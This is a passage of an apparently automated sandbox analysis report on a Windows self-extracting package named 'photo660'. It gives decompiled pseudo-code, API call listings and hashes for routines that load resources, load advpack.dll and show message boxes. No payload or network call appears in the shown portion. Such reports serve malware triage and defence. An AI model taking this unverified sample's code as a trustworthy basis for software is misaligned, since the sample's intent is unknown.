                                                                                                                                                                                                        0x002137cb
                                                                                                                                                                                                        0x002137cd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002137d5
                                                                                                                                                                                                        0x002137db
                                                                                                                                                                                                        0x002137e8
                                                                                                                                                                                                        0x002137ea
                                                                                                                                                                                                        0x002137ea
                                                                                                                                                                                                        0x002137ea
                                                                                                                                                                                                        0x002137f0
                                                                                                                                                                                                        0x002137f6
                                                                                                                                                                                                        0x00213805
                                                                                                                                                                                                        0x00213817
                                                                                                                                                                                                        0x0021382b
                                                                                                                                                                                                        0x00213830
                                                                                                                                                                                                        0x00213836
                                                                                                                                                                                                        0x0021383b
                                                                                                                                                                                                        0x0021383d
                                                                                                                                                                                                        0x002138eb
                                                                                                                                                                                                        0x002138eb
                                                                                                                                                                                                        0x002138f2
                                                                                                                                                                                                        0x0021390c
                                                                                                                                                                                                        0x00213911
                                                                                                                                                                                                        0x00213911
                                                                                                                                                                                                        0x00213913
                                                                                                                                                                                                        0x0021394d
                                                                                                                                                                                                        0x0021394d
                                                                                                                                                                                                        0x0021394f
                                                                                                                                                                                                        0x002138a9
                                                                                                                                                                                                        0x002138a9
                                                                                                                                                                                                        0x002138b0
                                                                                                                                                                                                        0x002138b2
                                                                                                                                                                                                        0x002138b9
                                                                                                                                                                                                        0x002138bb
                                                                                                                                                                                                        0x002138c1
                                                                                                                                                                                                        0x00213975
                                                                                                                                                                                                        0x002138c7
                                                                                                                                                                                                        0x002138de
                                                                                                                                                                                                        0x002138e0
                                                                                                                                                                                                        0x002138e0
                                                                                                                                                                                                        0x0021397b
                                                                                                                                                                                                        0x0021397d
                                                                                                                                                                                                        0x002139a9
                                                                                                                                                                                                        0x0021397f
                                                                                                                                                                                                        0x00213982
                                                                                                                                                                                                        0x0021398b
                                                                                                                                                                                                        0x0021398d
                                                                                                                                                                                                        0x0021398f
                                                                                                                                                                                                        0x0021399f
                                                                                                                                                                                                        0x002139a1
                                                                                                                                                                                                        0x00213991
                                                                                                                                                                                                        0x00213991
                                                                                                                                                                                                        0x00213991
                                                                                                                                                                                                        0x0021398f
                                                                                                                                                                                                        0x002139af
                                                                                                                                                                                                        0x002139b6
                                                                                                                                                                                                        0x00213a0f
                                                                                                                                                                                                        0x00213a0f
                                                                                                                                                                                                        0x00213a11
                                                                                                                                                                                                        0x00213a13
                                                                                                                                                                                                        0x00213a19
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002139b8
                                                                                                                                                                                                        0x002139b8
                                                                                                                                                                                                        0x002139ba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002139bc
                                                                                                                                                                                                        0x002139bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002139c3
                                                                                                                                                                                                        0x002139c9
                                                                                                                                                                                                        0x002139ce
                                                                                                                                                                                                        0x002139d0
                                                                                                                                                                                                        0x002139e3
                                                                                                                                                                                                        0x002139e5
                                                                                                                                                                                                        0x002139e6
                                                                                                                                                                                                        0x002139f1
                                                                                                                                                                                                        0x002139f7
                                                                                                                                                                                                        0x002139fa
                                                                                                                                                                                                        0x00213a01
                                                                                                                                                                                                        0x00213a04
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213a06
                                                                                                                                                                                                        0x00213a09
                                                                                                                                                                                                        0x00213a09
                                                                                                                                                                                                        0x00213a0b
                                                                                                                                                                                                        0x00213a0b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213a09
                                                                                                                                                                                                        0x002139fc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002139fc
                                                                                                                                                                                                        0x002139d3
                                                                                                                                                                                                        0x002139d8
                                                                                                                                                                                                        0x002139da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002139dc
                                                                                                                                                                                                        0x002139b6
                                                                                                                                                                                                        0x00213955
                                                                                                                                                                                                        0x0021395b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213961
                                                                                                                                                                                                        0x00213963
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213969
                                                                                                                                                                                                        0x00213969
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213969
                                                                                                                                                                                                        0x00213915
                                                                                                                                                                                                        0x00213915
                                                                                                                                                                                                        0x0021391b
                                                                                                                                                                                                        0x0021391f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021392d
                                                                                                                                                                                                        0x00213933
                                                                                                                                                                                                        0x00213938
                                                                                                                                                                                                        0x0021393a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213940
                                                                                                                                                                                                        0x00213946
                                                                                                                                                                                                        0x0021394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002138f2
                                                                                                                                                                                                        0x00213843
                                                                                                                                                                                                        0x00213845
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021384b
                                                                                                                                                                                                        0x0021384d
                                                                                                                                                                                                        0x00213883
                                                                                                                                                                                                        0x00213885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021389a
                                                                                                                                                                                                        0x0021389e
                                                                                                                                                                                                        0x0021389e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002138a0
                                                                                                                                                                                                        0x002138a0
                                                                                                                                                                                                        0x002138a2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002138a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002138a4
                                                                                                                                                                                                        0x0021384f
                                                                                                                                                                                                        0x00213851
                                                                                                                                                                                                        0x00213857
                                                                                                                                                                                                        0x0021386e
                                                                                                                                                                                                        0x00213877
                                                                                                                                                                                                        0x0021387b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213881
                                                                                                                                                                                                        0x00213859
                                                                                                                                                                                                        0x0021385c
                                                                                                                                                                                                        0x00213862
                                                                                                                                                                                                        0x00213866
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213868
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002138f4
                                                                                                                                                                                                        0x002138f4
                                                                                                                                                                                                        0x002138f5
                                                                                                                                                                                                        0x002138fb
                                                                                                                                                                                                        0x00213901
                                                                                                                                                                                                        0x00213901
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021390a
                                                                                                                                                                                                        0x0021374b
                                                                                                                                                                                                        0x0021374e
                                                                                                                                                                                                        0x0021375c
                                                                                                                                                                                                        0x00213764
                                                                                                                                                                                                        0x00213769
                                                                                                                                                                                                        0x0021376e
                                                                                                                                                                                                        0x00213771
                                                                                                                                                                                                        0x0021379c
                                                                                                                                                                                                        0x0021379f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002137a3
                                                                                                                                                                                                        0x002137a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002137a4
                                                                                                                                                                                                        0x00213773
                                                                                                                                                                                                        0x00213777
                                                                                                                                                                                                        0x00213778
                                                                                                                                                                                                        0x0021377f
                                                                                                                                                                                                        0x00213781
                                                                                                                                                                                                        0x0021378e
                                                                                                                                                                                                        0x0021378e
                                                                                                                                                                                                        0x00213794
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213794
                                                                                                                                                                                                        0x00213783
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213785
                                                                                                                                                                                                        0x0021378c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021378c
                                                                                                                                                                                                        0x00213750
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021372d
                                                                                                                                                                                                        0x0021372d
                                                                                                                                                                                                        0x0021396b
                                                                                                                                                                                                        0x0021396b
                                                                                                                                                                                                        0x0021396c
                                                                                                                                                                                                        0x0021396e
                                                                                                                                                                                                        0x0021396f
                                                                                                                                                                                                        0x00213a1e
                                                                                                                                                                                                        0x00213a1e
                                                                                                                                                                                                        0x00213a22
                                                                                                                                                                                                        0x00213a27
                                                                                                                                                                                                        0x00213a3e
                                                                                                                                                                                                        0x00213a3e

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00213723
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 002139C3
                                                                                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,photo660,00000030), ref: 002139F1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$BeepVersion
                                                                                                                                                                                                        • String ID: 3$photo660
                                                                                                                                                                                                        • API String ID: 2519184315-2999727582
                                                                                                                                                                                                        • Opcode ID: 3bef77c42b2c63d93afaf4171a029a4d1e3ec645d9fd117c90e50e0d14d10f61
                                                                                                                                                                                                        • Instruction ID: 559e5506f978ad3c29df776ccda3435dc38dbe5ab4f6f4fe920fd1ea97d25758
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bef77c42b2c63d93afaf4171a029a4d1e3ec645d9fd117c90e50e0d14d10f61
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F91F3B1A212259BEB34CF14CD857EAB7E6AF65304F1540A9D8899B281DB708FE1CF41
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00216517 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                                                        			E00216517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x219a3c; // 0x210000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E002144B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t5 =  &_a16; // 0x212ee8
					_t24 =  *_t5;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}







                                                                                                                                                                                                        0x0021651f
                                                                                                                                                                                                        0x0021652a
                                                                                                                                                                                                        0x00216534
                                                                                                                                                                                                        0x0021656b
                                                                                                                                                                                                        0x00216577
                                                                                                                                                                                                        0x0021657c
                                                                                                                                                                                                        0x0021657c
                                                                                                                                                                                                        0x00216536
                                                                                                                                                                                                        0x0021653e
                                                                                                                                                                                                        0x00216542
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00216544
                                                                                                                                                                                                        0x00216547
                                                                                                                                                                                                        0x0021654c
                                                                                                                                                                                                        0x00216549
                                                                                                                                                                                                        0x00216549
                                                                                                                                                                                                        0x00216549
                                                                                                                                                                                                        0x0021655e
                                                                                                                                                                                                        0x00216560
                                                                                                                                                                                                        0x00216569
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00216569
                                                                                                                                                                                                        0x00216542
                                                                                                                                                                                                        0x00216587

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00210000,000007D6,00000005), ref: 0021652A
                                                                                                                                                                                                        • LoadResource.KERNEL32(00210000,00000000,?,?,00212EE8,00000000,002119E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00216538
                                                                                                                                                                                                        • DialogBoxIndirectParamA.USER32(00210000,00000000,00000547,002119E0,00000000), ref: 00216557
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00212EE8,00000000,002119E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00216560
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                        • String ID: .!
                                                                                                                                                                                                        • API String ID: 1214682469-2740948462
                                                                                                                                                                                                        • Opcode ID: c7d3b15c49e068938cd7de0230100f3696485c819826b053cc0c218e5cc24f9e
                                                                                                                                                                                                        • Instruction ID: 0bb5fa20f31ec1011a9e5bad4ffcbdcca149acf41463510ec154f9006f1ca7fe
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7d3b15c49e068938cd7de0230100f3696485c819826b053cc0c218e5cc24f9e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44012672101206BBCB205F69AC0CEFF7AADEBA9360F404125FE04A3150DB718D608AE1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00216495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                        			E00216495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x218004; // 0x58ac7c6d
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00211781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
				_t26 = "advpack.dll";
				E0021658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00216CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}













                                                                                                                                                                                                        0x00216495
                                                                                                                                                                                                        0x00216495
                                                                                                                                                                                                        0x002164a0
                                                                                                                                                                                                        0x002164a7
                                                                                                                                                                                                        0x002164ab
                                                                                                                                                                                                        0x002164bd
                                                                                                                                                                                                        0x002164c2
                                                                                                                                                                                                        0x002164d3
                                                                                                                                                                                                        0x002164df
                                                                                                                                                                                                        0x002164e8
                                                                                                                                                                                                        0x00216502
                                                                                                                                                                                                        0x002164ee
                                                                                                                                                                                                        0x002164f9
                                                                                                                                                                                                        0x002164f9
                                                                                                                                                                                                        0x00216516

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 002164DF
                                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 002164F9
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00216502
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                                                                                                                                                        • API String ID: 438848745-3761280616
                                                                                                                                                                                                        • Opcode ID: 15504ab6814ef464350187977bf915969d3833a87e8bbb9dae7a48b9a9d6c625
                                                                                                                                                                                                        • Instruction ID: be6c7659d1e77646b28610312692de229b4f45b79e272f45138a56c71c9d27df
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15504ab6814ef464350187977bf915969d3833a87e8bbb9dae7a48b9a9d6c625
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5801D630520108BBDB10DBA4EC4DBEE77B9DB74311F900195F589921C0DFB09EE6CA51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00214169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 32%
                                                                                                                                                                                                        			E00214169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E0021468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E0021468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E002144B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E002144B9(0, 0x4b5, 0, 0, 0x10, 0);
			}





                                                                                                                                                                                                        0x0021417d
                                                                                                                                                                                                        0x0021418f
                                                                                                                                                                                                        0x00214193
                                                                                                                                                                                                        0x002141b7
                                                                                                                                                                                                        0x002141d3
                                                                                                                                                                                                        0x002141e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002141e7
                                                                                                                                                                                                        0x002141d5
                                                                                                                                                                                                        0x002141d6
                                                                                                                                                                                                        0x002141d8
                                                                                                                                                                                                        0x002141d9
                                                                                                                                                                                                        0x002141da
                                                                                                                                                                                                        0x002141df
                                                                                                                                                                                                        0x002141e1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002141e1
                                                                                                                                                                                                        0x002141b9
                                                                                                                                                                                                        0x002141ba
                                                                                                                                                                                                        0x002141bc
                                                                                                                                                                                                        0x002141bd
                                                                                                                                                                                                        0x002141be
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002141be
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146A0
                                                                                                                                                                                                          • Part of subcall function 0021468F: SizeofResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146A9
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146C3
                                                                                                                                                                                                          • Part of subcall function 0021468F: LoadResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146CC
                                                                                                                                                                                                          • Part of subcall function 0021468F: LockResource.KERNEL32(00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146D3
                                                                                                                                                                                                          • Part of subcall function 0021468F: memcpy_s.MSVCRT ref: 002146E5
                                                                                                                                                                                                          • Part of subcall function 0021468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002146EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,002130B4), ref: 00214189
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,002130B4), ref: 002141E7
                                                                                                                                                                                                          • Part of subcall function 002144B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                          • Part of subcall function 002144B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$FINISHMSG
                                                                                                                                                                                                        • API String ID: 3507850446-3091758298
                                                                                                                                                                                                        • Opcode ID: deeab2d133b3b1cea51f5e6576daf0b9aac6f715d108b26990b731cd888d61b3
                                                                                                                                                                                                        • Instruction ID: 0afa40885a1855612bc0faf615a84c25d6e4d1893068f51ec5a2c5b3f3e55d56
                                                                                                                                                                                                        • Opcode Fuzzy Hash: deeab2d133b3b1cea51f5e6576daf0b9aac6f715d108b26990b731cd888d61b3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F01FDB53202253BE3243A255C9AFFB21CEDBB5794F104025B70EE1180CEA8CCA10475
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00217155 Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00217155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x218004; // 0x58ac7c6d
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x218004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x218004 = _t39;
				}
				_t37 =  !_t36;
				 *0x218008 = _t37;
				return _t37;
			}











                                                                                                                                                                                                        0x0021715d
                                                                                                                                                                                                        0x00217161
                                                                                                                                                                                                        0x00217165
                                                                                                                                                                                                        0x00217178
                                                                                                                                                                                                        0x00217182
                                                                                                                                                                                                        0x0021718e
                                                                                                                                                                                                        0x00217197
                                                                                                                                                                                                        0x002171a0
                                                                                                                                                                                                        0x002171b1
                                                                                                                                                                                                        0x002171b8
                                                                                                                                                                                                        0x002171c4
                                                                                                                                                                                                        0x002171c7
                                                                                                                                                                                                        0x002171cb
                                                                                                                                                                                                        0x002171d5
                                                                                                                                                                                                        0x002171da
                                                                                                                                                                                                        0x002171da
                                                                                                                                                                                                        0x002171dc
                                                                                                                                                                                                        0x002171dc
                                                                                                                                                                                                        0x002171e2
                                                                                                                                                                                                        0x002171e5
                                                                                                                                                                                                        0x002171ee

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00217182
                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00217191
                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0021719A
                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 002171A3
                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 002171B8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                                                                                        • Opcode ID: 59b5d977472628662ed4fe18f110f2d1a554ffc241dfba3528bd3d43c7f81d0d
                                                                                                                                                                                                        • Instruction ID: 9a8926967549de9d84095ea17cb5705ab22eca23ca78a11a31cceaf4e8a53323
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 59b5d977472628662ed4fe18f110f2d1a554ffc241dfba3528bd3d43c7f81d0d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B111C71D15208EFCB10DFF8EA8CADEB7F5EF68315F618855D809E7210EA309A548B41
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 002119E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E002119E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x218004; // 0x58ac7c6d
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
